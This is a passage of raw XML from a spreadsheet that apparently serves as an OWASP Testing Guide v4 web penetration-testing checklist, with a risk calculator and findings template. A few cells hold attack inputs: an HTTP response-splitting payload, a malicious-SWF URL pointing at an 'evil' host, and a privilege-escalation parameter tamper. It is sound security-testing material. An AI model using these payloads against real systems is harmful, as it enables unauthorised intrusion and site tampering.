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Confidential\Philips\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <bookViews>
    <workbookView xWindow="0" yWindow="0" windowWidth="20490" windowHeight="7650"/>
  </bookViews>
  <sheets>
    <sheet name="Testing Checklist" sheetId="1" r:id="rId1"/>
    <sheet name="Summary Findings" sheetId="4" r:id="rId2"/>
    <sheet name="Risk Assessment Calculator" sheetId="2" r:id="rId3"/>
    <sheet name="References" sheetId="3" r:id="rId4"/>
  </sheets>
  <definedNames>
    <definedName name="Awareness">References!$M$3:$M$7</definedName>
    <definedName name="EaseofExploit">References!$K$3:$K$7</definedName>
    <definedName name="EasyofDiscovery">References!$I$3:$I$7</definedName>
    <definedName name="FinancialDamage">References!$I$12:$I$16</definedName>
    <definedName name="IntrusionDetection">References!$O$3:$O$7</definedName>
    <definedName name="LossofAccountability">References!$G$12:$G$15</definedName>
    <definedName name="LossofAvailability">References!$E$12:$E$16</definedName>
    <definedName name="LossofConfidentiality">References!$A$12:$A$16</definedName>
    <definedName name="LossofIntegrity">References!$C$12:$C$17</definedName>
    <definedName name="Motive">References!$C$3:$C$6</definedName>
    <definedName name="NonCompliance">References!$M$12:$M$15</definedName>
    <definedName name="Opportunity">References!$E$3:$E$6</definedName>
    <definedName name="PolicyViolation">References!$O$12:$O$16</definedName>
    <definedName name="PopulationSize">References!$G$3:$G$8</definedName>
    <definedName name="ReputationDamage">References!$K$12:$K$16</definedName>
    <definedName name="result">'Testing Checklist'!$A$128:$A$130</definedName>
    <definedName name="SkillRequired">References!$A$3:$A$8</definedName>
  </definedNames>
  <calcPr calcId="162913"/>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H6" i="2" l="1"/>
  <c r="E8" i="2" l="1"/>
  <c r="E7" i="2"/>
  <c r="E14" i="2"/>
  <c r="E13" i="2"/>
  <c r="E12" i="2"/>
  <c r="E11" i="2"/>
  <c r="H14" i="2"/>
  <c r="H13" i="2"/>
  <c r="H12" i="2"/>
  <c r="H11" i="2"/>
  <c r="H5" i="2"/>
  <c r="H7" i="2"/>
  <c r="H8" i="2"/>
  <c r="G16" i="2" s="1"/>
  <c r="E6" i="2"/>
  <c r="E5" i="2"/>
  <c r="B16" i="2" s="1"/>
  <c r="A25" i="2" s="1"/>
  <c r="A26" i="2" l="1"/>
  <c r="A24" i="2"/>
  <c r="B24" i="2"/>
  <c r="D25" i="2"/>
  <c r="C24" i="2"/>
  <c r="D26" i="2"/>
  <c r="C25" i="2"/>
  <c r="D23" i="2"/>
  <c r="C23" i="2"/>
  <c r="C26" i="2"/>
  <c r="D24" i="2"/>
  <c r="B26" i="2"/>
  <c r="B25" i="2"/>
  <c r="E20" i="2"/>
  <c r="B23" i="2"/>
</calcChain>
</file>

<file path=xl/comments1.xml><?xml version="1.0" encoding="utf-8"?>
<comments xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <authors>
    <author>its02</author>
    <author>pphongthiproek</author>
  </authors>
  <commentList>
    <comment ref="A5" authorId="0" shapeId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">How technically skilled is this group of threat agents? </t>
        </r>
      </text>
    </comment>
    <comment ref="F5" authorId="1" shapeId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>How much data could be disclosed and how sensitive is it?</t>
        </r>
      </text>
    </comment>
    <comment ref="A6" authorId="0" shapeId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>How motivated is this group of threat agents to find and exploit this vulnerability?</t>
        </r>
      </text>
    </comment>
    <comment ref="F6" authorId="1" shapeId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>How much data could be corrupted and how damaged is it?</t>
        </r>
      </text>
    </comment>
    <comment ref="A7" authorId="1" shapeId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>What resources and opportunities are required for this group of threat agents to find and exploit this vulnerability?</t>
        </r>
      </text>
    </comment>
    <comment ref="F7" authorId="1" shapeId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>How much service could be lost and how vital is it?</t>
        </r>
      </text>
    </comment>
    <comment ref="A8" authorId="1" shapeId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>How large is this group of threat agents?</t>
        </r>
      </text>
    </comment>
    <comment ref="F8" authorId="1" shapeId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Are the threat agents' actions traceable to an individual?</t>
        </r>
      </text>
    </comment>
    <comment ref="A11" authorId="1" shapeId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>How easy is it for this group of threat agents to discover this vulnerability?</t>
        </r>
      </text>
    </comment>
    <comment ref="F11" authorId="1" shapeId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>How much financial damage will result from an exploit?</t>
        </r>
      </text>
    </comment>
    <comment ref="A12" authorId="1" shapeId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>How easy is it for this group of threat agents to actually exploit this vulnerability?</t>
        </r>
      </text>
    </comment>
    <comment ref="F12" authorId="1" shapeId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Would an exploit result in reputation damage that would harm the business?</t>
        </r>
      </text>
    </comment>
    <comment ref="A13" authorId="1" shapeId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>How well known is this vulnerability to this group of threat agents?</t>
        </r>
      </text>
    </comment>
    <comment ref="F13" authorId="1" shapeId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>How much exposure does non-compliance introduce?</t>
        </r>
      </text>
    </comment>
    <comment ref="A14" authorId="1" shapeId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>How likely is an exploit to be detected?</t>
        </r>
      </text>
    </comment>
    <comment ref="F14" authorId="1" shapeId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>How much personally identifiable information could be disclosed?</t>
        </r>
      </text>
    </comment>
  </commentList>
</comments>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="744" uniqueCount="464">
  <si>
    <t>Information Gathering</t>
  </si>
  <si>
    <t>Authentication Testing</t>
  </si>
  <si>
    <t xml:space="preserve">Authorization Testing </t>
  </si>
  <si>
    <t>Data Validation Testing</t>
  </si>
  <si>
    <t>Identify application entry points</t>
  </si>
  <si>
    <t>Tools</t>
  </si>
  <si>
    <t>Test Name</t>
  </si>
  <si>
    <t>N/A</t>
  </si>
  <si>
    <t>OWASP Risk Assessment Calculator
Risk Assessment Calculator</t>
  </si>
  <si>
    <t>Likelihood factors</t>
  </si>
  <si>
    <t>Impact factors</t>
  </si>
  <si>
    <t>REF</t>
  </si>
  <si>
    <t>http://paradoslabs.nl/owaspcalc/index.php</t>
  </si>
  <si>
    <t>Threat Agent Factors</t>
  </si>
  <si>
    <t>Technical Impact Factors</t>
  </si>
  <si>
    <t>Skills required</t>
  </si>
  <si>
    <t>Loss of confidentiality</t>
  </si>
  <si>
    <t>Extensive non-sensitive data disclosed [6]</t>
  </si>
  <si>
    <t>Motive</t>
  </si>
  <si>
    <t>Low or no reward [1]</t>
  </si>
  <si>
    <t>Loss of Integrity</t>
  </si>
  <si>
    <t>Extensive seriously corrupt data [7]</t>
  </si>
  <si>
    <t>Opportunity</t>
  </si>
  <si>
    <t>Some access or resources required [7]</t>
  </si>
  <si>
    <t>Loss of Availability</t>
  </si>
  <si>
    <t>Minimal primary services interrupted [5]</t>
  </si>
  <si>
    <t>Population Size</t>
  </si>
  <si>
    <t>System Administrators [2]</t>
  </si>
  <si>
    <t>Loss of Accountability</t>
  </si>
  <si>
    <t>Attack completely anonymous [9]</t>
  </si>
  <si>
    <t>Vulnerability Factors</t>
  </si>
  <si>
    <t>Business Impact Factors</t>
  </si>
  <si>
    <t>Easy of Discovery</t>
  </si>
  <si>
    <t>Difficult [3]</t>
  </si>
  <si>
    <t>Financial damage</t>
  </si>
  <si>
    <t>Backruptcy [9]</t>
  </si>
  <si>
    <t>Ease of Exploit</t>
  </si>
  <si>
    <t>Reputation damage</t>
  </si>
  <si>
    <t>Brand damage [9]</t>
  </si>
  <si>
    <t>Awareness</t>
  </si>
  <si>
    <t>Unknown [1]</t>
  </si>
  <si>
    <t>Non-Compliance</t>
  </si>
  <si>
    <t>High profile violation [7]</t>
  </si>
  <si>
    <t>Intrusion Detection</t>
  </si>
  <si>
    <t>Active detection in application [1]</t>
  </si>
  <si>
    <t>Privacy violation</t>
  </si>
  <si>
    <t>Thousands of people [7]</t>
  </si>
  <si>
    <t>Likelihood score:</t>
  </si>
  <si>
    <t>Impact score:</t>
  </si>
  <si>
    <t>Overall Risk Severity :</t>
  </si>
  <si>
    <t>Impact</t>
  </si>
  <si>
    <t>Likelihood</t>
  </si>
  <si>
    <t>Select an option</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>Not Applicable [0]</t>
  </si>
  <si>
    <t>Full access or expensive resources required [0]</t>
  </si>
  <si>
    <t>Special access or resources required [4]</t>
  </si>
  <si>
    <t>Practically impossible [1]</t>
  </si>
  <si>
    <t>Theoretical [1]</t>
  </si>
  <si>
    <t>Possible reward [4]</t>
  </si>
  <si>
    <t>Intranet Users [4]</t>
  </si>
  <si>
    <t>Hidden [4]</t>
  </si>
  <si>
    <t>Logged and reviewed [3]</t>
  </si>
  <si>
    <t>High reward [9]</t>
  </si>
  <si>
    <t>No access or resources required [9]</t>
  </si>
  <si>
    <t>Partners [5]</t>
  </si>
  <si>
    <t>Easy [7]</t>
  </si>
  <si>
    <t>Easy [5]</t>
  </si>
  <si>
    <t>Obvious [6]</t>
  </si>
  <si>
    <t>Logged without review [8]</t>
  </si>
  <si>
    <t>Authenticated users [6]</t>
  </si>
  <si>
    <t>Automated tools available [9]</t>
  </si>
  <si>
    <t>Not logged [9]</t>
  </si>
  <si>
    <t>Anonymous Internet users [9]</t>
  </si>
  <si>
    <t>Minimal non-sensitive data disclosed [2]</t>
  </si>
  <si>
    <t>Minimal slightly corrupt data [1]</t>
  </si>
  <si>
    <t>Minimal secondary services interrupted [1]</t>
  </si>
  <si>
    <t>Attack fully traceable to individual [1]</t>
  </si>
  <si>
    <t>Damage costs less than to fix the issue [1]</t>
  </si>
  <si>
    <t>Minimal damage [1]</t>
  </si>
  <si>
    <t>Minor violation [2]</t>
  </si>
  <si>
    <t>One individual [3]</t>
  </si>
  <si>
    <t>Minimal seriously corrupt data [3]</t>
  </si>
  <si>
    <t>Attack possibly traceable to individual [7]</t>
  </si>
  <si>
    <t>Minor effect on annual profit [3]</t>
  </si>
  <si>
    <t>Loss of major accounts [4]</t>
  </si>
  <si>
    <t>Clear violation [5]</t>
  </si>
  <si>
    <t>Hundreds of people [5]</t>
  </si>
  <si>
    <t>Extensive critical data disclosed [7]</t>
  </si>
  <si>
    <t>Extensive slightly corrupt data [5]</t>
  </si>
  <si>
    <t>Extensive primary services interrupted [7]</t>
  </si>
  <si>
    <t>Significant effect on annual profit [7]</t>
  </si>
  <si>
    <t>Loss of goodwill [5]</t>
  </si>
  <si>
    <t>All data disclosed [9]</t>
  </si>
  <si>
    <t>All services completely lost [9]</t>
  </si>
  <si>
    <t>Millions of people [9]</t>
  </si>
  <si>
    <t>All data totally corrupt [9]</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>Identify from hidden fields, parameters, methods HTTP header analysis</t>
  </si>
  <si>
    <t>Find important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc)</t>
  </si>
  <si>
    <t>Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filename</t>
  </si>
  <si>
    <t>Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080)</t>
  </si>
  <si>
    <t>Generic login error statement check, return codes/parameter values, enumerate all possible valid userids (Login system, Forgot password)</t>
  </si>
  <si>
    <t>Testing for role/privilege manipulate the values of hidden variables. Change some param groupid=2 to groupid=1</t>
  </si>
  <si>
    <t>Test for the user inputs obtained from client-side JavaScript Objects</t>
  </si>
  <si>
    <t>Decompile, Undefined variables, Unsafe methods, Include malicious SWF (http://victim/file.swf?lang=http://evil</t>
  </si>
  <si>
    <t>Testing ORM injection is identical to SQL injection testing</t>
  </si>
  <si>
    <t>• Testing for heap overflow vulnerability
• Testing for stack overflow vulnerability
• Testing for format string vulnerability</t>
  </si>
  <si>
    <t>param=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a&lt;html&gt;Sorry,%20System%20Down&lt;/html&gt;</t>
  </si>
  <si>
    <t>Pass</t>
  </si>
  <si>
    <t>Issues</t>
  </si>
  <si>
    <t>Result</t>
  </si>
  <si>
    <t>Recommendation</t>
  </si>
  <si>
    <t>High</t>
  </si>
  <si>
    <t>Risk</t>
  </si>
  <si>
    <t>Moderate</t>
  </si>
  <si>
    <t>Not Started</t>
  </si>
  <si>
    <t>Remark</t>
  </si>
  <si>
    <t>Configuration and Deploy Management Testing</t>
  </si>
  <si>
    <t>OTG-INFO-001</t>
  </si>
  <si>
    <t>OTG-INFO-002</t>
  </si>
  <si>
    <t>OTG-INFO-003</t>
  </si>
  <si>
    <t>OTG-INFO-004</t>
  </si>
  <si>
    <t>OTG-INFO-005</t>
  </si>
  <si>
    <t>OTG-INFO-006</t>
  </si>
  <si>
    <t>OTG-INFO-007</t>
  </si>
  <si>
    <t>OTG-INFO-008</t>
  </si>
  <si>
    <t>OTG-INFO-009</t>
  </si>
  <si>
    <t>OTG-INFO-010</t>
  </si>
  <si>
    <t>Conduct Search Engine Discovery and Reconnaissance for Information Leakage</t>
  </si>
  <si>
    <t>Fingerprint Web Server</t>
  </si>
  <si>
    <t>Review Webserver Metafiles for Information Leakage</t>
  </si>
  <si>
    <t>Enumerate Applications on Webserver</t>
  </si>
  <si>
    <t>Review Webpage Comments and Metadata for Information Leakage</t>
  </si>
  <si>
    <t>Map execution paths through application</t>
  </si>
  <si>
    <t>Fingerprint Web Application Framework</t>
  </si>
  <si>
    <t>Fingerprint Web Application</t>
  </si>
  <si>
    <t>Map Application Architecture</t>
  </si>
  <si>
    <t>OTG-CONFIG-001</t>
  </si>
  <si>
    <t>OTG-CONFIG-002</t>
  </si>
  <si>
    <t>OTG-CONFIG-003</t>
  </si>
  <si>
    <t>OTG-CONFIG-004</t>
  </si>
  <si>
    <t>OTG-CONFIG-005</t>
  </si>
  <si>
    <t>OTG-CONFIG-006</t>
  </si>
  <si>
    <t>OTG-CONFIG-007</t>
  </si>
  <si>
    <t>OTG-CONFIG-008</t>
  </si>
  <si>
    <t>Test Network/Infrastructure Configuration</t>
  </si>
  <si>
    <t>Test Application Platform Configuration</t>
  </si>
  <si>
    <t>Test File Extensions Handling for Sensitive Information</t>
  </si>
  <si>
    <t>Backup and Unreferenced Files for Sensitive Information</t>
  </si>
  <si>
    <t>Enumerate Infrastructure and Application Admin Interfaces</t>
  </si>
  <si>
    <t>Test HTTP Methods</t>
  </si>
  <si>
    <t>Test HTTP Strict Transport Security</t>
  </si>
  <si>
    <t>Test RIA cross domain policy</t>
  </si>
  <si>
    <t>Identity Management Testing</t>
  </si>
  <si>
    <t>OTG-IDENT-001</t>
  </si>
  <si>
    <t>OTG-IDENT-002</t>
  </si>
  <si>
    <t>OTG-IDENT-003</t>
  </si>
  <si>
    <t>OTG-IDENT-004</t>
  </si>
  <si>
    <t>OTG-IDENT-005</t>
  </si>
  <si>
    <t>OTG-IDENT-006</t>
  </si>
  <si>
    <t>OTG-IDENT-007</t>
  </si>
  <si>
    <t>Test Role Definitions</t>
  </si>
  <si>
    <t>Test User Registration Process</t>
  </si>
  <si>
    <t>Test Account Provisioning Process</t>
  </si>
  <si>
    <t>Testing for Account Enumeration and Guessable User Account</t>
  </si>
  <si>
    <t>Testing for Weak or unenforced username policy</t>
  </si>
  <si>
    <t>Test Permissions of Guest/Training Accounts</t>
  </si>
  <si>
    <t>Test Account Suspension/Resumption Process</t>
  </si>
  <si>
    <t>OTG-AUTHN-001</t>
  </si>
  <si>
    <t>OTG-AUTHN-002</t>
  </si>
  <si>
    <t>OTG-AUTHN-003</t>
  </si>
  <si>
    <t>OTG-AUTHN-004</t>
  </si>
  <si>
    <t>OTG-AUTHN-005</t>
  </si>
  <si>
    <t>OTG-AUTHN-006</t>
  </si>
  <si>
    <t>OTG-AUTHN-007</t>
  </si>
  <si>
    <t>OTG-AUTHN-008</t>
  </si>
  <si>
    <t>OTG-AUTHN-009</t>
  </si>
  <si>
    <t>OTG-AUTHN-010</t>
  </si>
  <si>
    <t>Testing for Credentials Transported over an Encrypted Channel</t>
  </si>
  <si>
    <t>Testing for default credentials</t>
  </si>
  <si>
    <t>Testing for Weak lock out mechanism</t>
  </si>
  <si>
    <t>Testing for bypassing authentication schema</t>
  </si>
  <si>
    <t>Test remember password functionality</t>
  </si>
  <si>
    <t>Testing for Browser cache weakness</t>
  </si>
  <si>
    <t>Testing for Weak password policy</t>
  </si>
  <si>
    <t>Testing for Weak security question/answer</t>
  </si>
  <si>
    <t>Testing for weak password change or reset functionalities</t>
  </si>
  <si>
    <t>Testing for Weaker authentication in alternative channel</t>
  </si>
  <si>
    <t>OTG-AUTHZ-001</t>
  </si>
  <si>
    <t>OTG-AUTHZ-002</t>
  </si>
  <si>
    <t>OTG-AUTHZ-003</t>
  </si>
  <si>
    <t>OTG-AUTHZ-004</t>
  </si>
  <si>
    <t>Testing Directory traversal/file include</t>
  </si>
  <si>
    <t>Testing for bypassing authorization schema</t>
  </si>
  <si>
    <t>Testing for Privilege Escalation</t>
  </si>
  <si>
    <t>Testing for Insecure Direct Object References</t>
  </si>
  <si>
    <t>Session Management Testing</t>
  </si>
  <si>
    <t>OTG-SESS-001</t>
  </si>
  <si>
    <t>OTG-SESS-002</t>
  </si>
  <si>
    <t>OTG-SESS-003</t>
  </si>
  <si>
    <t>OTG-SESS-004</t>
  </si>
  <si>
    <t>OTG-SESS-005</t>
  </si>
  <si>
    <t>OTG-SESS-006</t>
  </si>
  <si>
    <t>OTG-SESS-007</t>
  </si>
  <si>
    <t>OTG-SESS-008</t>
  </si>
  <si>
    <t>Testing for Bypassing Session Management Schema</t>
  </si>
  <si>
    <t>Testing for Cookies attributes</t>
  </si>
  <si>
    <t>Testing for Session Fixation</t>
  </si>
  <si>
    <t>Testing for Exposed Session Variables</t>
  </si>
  <si>
    <t>Testing for Cross Site Request Forgery</t>
  </si>
  <si>
    <t>Testing for logout functionality</t>
  </si>
  <si>
    <t>Test Session Timeout</t>
  </si>
  <si>
    <t>Testing for Session puzzling</t>
  </si>
  <si>
    <t>Testing for Reflected Cross Site Scripting</t>
  </si>
  <si>
    <t>Testing for Stored Cross Site Scripting</t>
  </si>
  <si>
    <t>Testing for HTTP Verb Tampering</t>
  </si>
  <si>
    <t>Testing for HTTP Parameter pollution</t>
  </si>
  <si>
    <t>Testing for SQL Injection</t>
  </si>
  <si>
    <t>Oracle Testing</t>
  </si>
  <si>
    <t>MySQL Testing</t>
  </si>
  <si>
    <t>SQL Server Testing</t>
  </si>
  <si>
    <t>Testing PostgreSQL</t>
  </si>
  <si>
    <t>MS Access Testing</t>
  </si>
  <si>
    <t>Testing for NoSQL injection</t>
  </si>
  <si>
    <t>Testing for LDAP Injection</t>
  </si>
  <si>
    <t>Testing for ORM Injection</t>
  </si>
  <si>
    <t>Testing for XML Injection</t>
  </si>
  <si>
    <t>Testing for SSI Injection</t>
  </si>
  <si>
    <t>Testing for XPath Injection</t>
  </si>
  <si>
    <t>IMAP/SMTP Injection</t>
  </si>
  <si>
    <t>Testing for Code Injection</t>
  </si>
  <si>
    <t>Testing for Local File Inclusion</t>
  </si>
  <si>
    <t>Testing for Remote File Inclusion</t>
  </si>
  <si>
    <t>Testing for Command Injection</t>
  </si>
  <si>
    <t>Testing for Buffer overflow</t>
  </si>
  <si>
    <t>Testing for Heap overflow</t>
  </si>
  <si>
    <t>Testing for Stack overflow</t>
  </si>
  <si>
    <t>Testing for Format string</t>
  </si>
  <si>
    <t>Testing for incubated vulnerabilities</t>
  </si>
  <si>
    <t>Testing for HTTP Splitting/Smuggling</t>
  </si>
  <si>
    <t>OTG-INPVAL-001</t>
  </si>
  <si>
    <t>OTG-INPVAL-002</t>
  </si>
  <si>
    <t>OTG-INPVAL-003</t>
  </si>
  <si>
    <t>OTG-INPVAL-004</t>
  </si>
  <si>
    <t>OTG-INPVAL-005</t>
  </si>
  <si>
    <t>OTG-INPVAL-006</t>
  </si>
  <si>
    <t>OTG-INPVAL-007</t>
  </si>
  <si>
    <t>OTG-INPVAL-008</t>
  </si>
  <si>
    <t>OTG-INPVAL-009</t>
  </si>
  <si>
    <t>OTG-INPVAL-010</t>
  </si>
  <si>
    <t>OTG-INPVAL-011</t>
  </si>
  <si>
    <t>OTG-INPVAL-012</t>
  </si>
  <si>
    <t>OTG-INPVAL-013</t>
  </si>
  <si>
    <t>OTG-INPVAL-014</t>
  </si>
  <si>
    <t>OTG-INPVAL-015</t>
  </si>
  <si>
    <t>OTG-INPVAL-016</t>
  </si>
  <si>
    <t>Error Handling</t>
  </si>
  <si>
    <t>Analysis of Error Codes</t>
  </si>
  <si>
    <t>Analysis of Stack Traces</t>
  </si>
  <si>
    <t>OTG-ERR-001</t>
  </si>
  <si>
    <t>OTG-ERR-002</t>
  </si>
  <si>
    <t>Cryptography</t>
  </si>
  <si>
    <t>Testing for Weak SSL/TSL Ciphers, Insufficient Transport Layer Protection</t>
  </si>
  <si>
    <t>Testing for Padding Oracle</t>
  </si>
  <si>
    <t>Testing for Sensitive information sent via unencrypted channels</t>
  </si>
  <si>
    <t>OTG-CRYPST-001</t>
  </si>
  <si>
    <t>OTG-CRYPST-002</t>
  </si>
  <si>
    <t>OTG-CRYPST-003</t>
  </si>
  <si>
    <t>Business logic Testing</t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-001</t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-002</t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-003</t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-004</t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-005</t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-006</t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-007</t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-008</t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-009</t>
  </si>
  <si>
    <t>Test Business Logic Data Validation</t>
  </si>
  <si>
    <t>Test Ability to Forge Requests</t>
  </si>
  <si>
    <t>Test Integrity Checks</t>
  </si>
  <si>
    <t>Test for Process Timing</t>
  </si>
  <si>
    <t>Test Number of Times a Function Can be Used Limits</t>
  </si>
  <si>
    <t>Testing for the Circumvention of Work Flows</t>
  </si>
  <si>
    <t>Test Defenses Against Application Mis-use</t>
  </si>
  <si>
    <t>Test Upload of Unexpected File Types</t>
  </si>
  <si>
    <t>Test Upload of Malicious Files</t>
  </si>
  <si>
    <t>Client Side Testing</t>
  </si>
  <si>
    <t>OTG-CLIENT-001</t>
  </si>
  <si>
    <t>OTG-CLIENT-002</t>
  </si>
  <si>
    <t>OTG-CLIENT-003</t>
  </si>
  <si>
    <t>OTG-CLIENT-004</t>
  </si>
  <si>
    <t>OTG-CLIENT-005</t>
  </si>
  <si>
    <t>OTG-CLIENT-006</t>
  </si>
  <si>
    <t>OTG-CLIENT-007</t>
  </si>
  <si>
    <t>OTG-CLIENT-008</t>
  </si>
  <si>
    <t>OTG-CLIENT-009</t>
  </si>
  <si>
    <t>OTG-CLIENT-010</t>
  </si>
  <si>
    <t>OTG-CLIENT-011</t>
  </si>
  <si>
    <t>OTG-CLIENT-012</t>
  </si>
  <si>
    <t>Testing for DOM based Cross Site Scripting</t>
  </si>
  <si>
    <t>Testing for JavaScript Execution</t>
  </si>
  <si>
    <t>Testing for HTML Injection</t>
  </si>
  <si>
    <t>Testing for Client Side URL Redirect</t>
  </si>
  <si>
    <t>Testing for CSS Injection</t>
  </si>
  <si>
    <t>Testing for Client Side Resource Manipulation</t>
  </si>
  <si>
    <t>Test Cross Origin Resource Sharing</t>
  </si>
  <si>
    <t>Testing for Cross Site Flashing</t>
  </si>
  <si>
    <t>Testing for Clickjacking</t>
  </si>
  <si>
    <t>Testing WebSockets</t>
  </si>
  <si>
    <t>Test Web Messaging</t>
  </si>
  <si>
    <t>Test Local Storage</t>
  </si>
  <si>
    <t>Use a search engine to search for Network diagrams and Configurations, Credentials, Error message content.</t>
  </si>
  <si>
    <t>Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits. Using
"HTTP header field ordering" and "Malformed requests test".</t>
  </si>
  <si>
    <t>Httprint, Httprecon, Desenmascarame</t>
  </si>
  <si>
    <t>Browser, curl, wget</t>
  </si>
  <si>
    <t>Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers</t>
  </si>
  <si>
    <t>Google Hacking, Sitedigger, Shodan, FOCA, Punkspider</t>
  </si>
  <si>
    <t>Find sensitive information from webpage comments and Metadata on source code.</t>
  </si>
  <si>
    <t>Map the target application and understand the principal workflows.</t>
  </si>
  <si>
    <t>Analyze robots.txt and identify &lt;META&gt; Tags from website.</t>
  </si>
  <si>
    <t>Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders.</t>
  </si>
  <si>
    <t>Whatweb, BlindElephant, Wappalyzer</t>
  </si>
  <si>
    <t>Identify the web application and version to determine known vulnerabilities and the appropriate exploits.</t>
  </si>
  <si>
    <t>Identify application architecture including Web language, WAF, Reverse proxy, Application Server, Backend Database</t>
  </si>
  <si>
    <t>OWASP: Testing Guide v4 Checklist</t>
  </si>
  <si>
    <t>No.</t>
  </si>
  <si>
    <t>Vulnerability Name</t>
  </si>
  <si>
    <t>SQL Injection</t>
  </si>
  <si>
    <t>Affected Host/Path</t>
  </si>
  <si>
    <t xml:space="preserve"> OTG</t>
  </si>
  <si>
    <t>www.example.com/news.php (id,page)</t>
  </si>
  <si>
    <t>Observation/Implication</t>
  </si>
  <si>
    <t>Test Evidence</t>
  </si>
  <si>
    <t>xxx-1</t>
  </si>
  <si>
    <t>Nessus</t>
  </si>
  <si>
    <t>Understand the infrastructure elements interactions, config management for software, backend DB server, WebDAV, FTP in order to identify known vulnerabilities.</t>
  </si>
  <si>
    <t>Identify default installation file/directory, Handle Server errors (40*,50*), Minimal Privilege, Software logging.</t>
  </si>
  <si>
    <t>Browser, Nikto</t>
  </si>
  <si>
    <t>Nessus, Nikto, Wikto</t>
  </si>
  <si>
    <t>netcat, curl</t>
  </si>
  <si>
    <t>Identify HTTP allowed methods on Web server with OPTIONS. Arbitrary HTTP Methods, HEAD access control bypass and XST</t>
  </si>
  <si>
    <t>Identify HSTS header on Web server through HTTP response header. 
curl -s -D- https://domain.com/ | grep Strict</t>
  </si>
  <si>
    <t>Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.</t>
  </si>
  <si>
    <t>Validate the system roles defined within the application by creating permission matrix.</t>
  </si>
  <si>
    <t>Verify that the identity requirements for user registration are aligned
with business and security requirements:</t>
  </si>
  <si>
    <t>Determine which roles are able to provision users and what sort of
accounts they can provision.</t>
  </si>
  <si>
    <t>User account names are often highly structured (e.g. Joe Bloggs
account name is jbloggs and Fred Nurks account name is fnurks)
and valid account names can easily be guessed.</t>
  </si>
  <si>
    <t>Guest and Training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorisation process required for access.Evaluate consistency between access policy and guest/training account access permissions.</t>
  </si>
  <si>
    <t>Verify the identity requirements for user registration align with business/security requirements. Validate the registration process.</t>
  </si>
  <si>
    <t>Check referrer whether its HTTP or HTTPs. Sending data through HTTP and HTTPS.</t>
  </si>
  <si>
    <t>Testing for default credentials of common applications, Testing for default password of new accounts.</t>
  </si>
  <si>
    <t>Evaluate the account lockout mechanism’s ability to mitigate
